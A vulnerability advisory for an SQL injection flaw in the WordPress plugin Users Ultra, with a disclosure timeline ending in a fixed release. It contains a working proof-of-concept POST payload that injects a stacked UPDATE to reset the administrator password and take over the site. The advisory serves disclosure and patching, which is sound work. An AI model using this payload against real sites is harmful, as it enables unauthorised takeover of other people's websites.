Users Ultra [SQL injection]

WordPress plugin Users Ultra suffers for an SQL Injection vulnerability.

Description

One can perform an SQL injection attack simply by exploiting wp_ajax_nopriv_rating_vote action. POST parameters data_target and data_vote can be used to execute arbitrary SQL commands in the database.

Proof of Concept

In the following PoC we change the administrators password to ‘1’ so a malicious user can then login as the administrator, taking full control of the website.

  1. Send a post request to http://my.vulnerable.website.com/wp-admin/admin-ajax.php with data: action=rating_vote&data_id=1&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1) where ID &data_vote=1
  2. Login with administrator’s user name and password 1

Note that we assume that table name prefix is wp and administrators user id is 1, a very common scenario.


INFO
TIMELINE
  • 2015-05-29:
    Discovered
  • 2015-05-30:
    Vendor notified via contact form
  • 2015-06-01:
    Vendor notified via support forums at wordpress.org
  • 2015-06-02:
    Vendor responded
  • 2015-06-04:
    Fix released in version 1.5.16
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX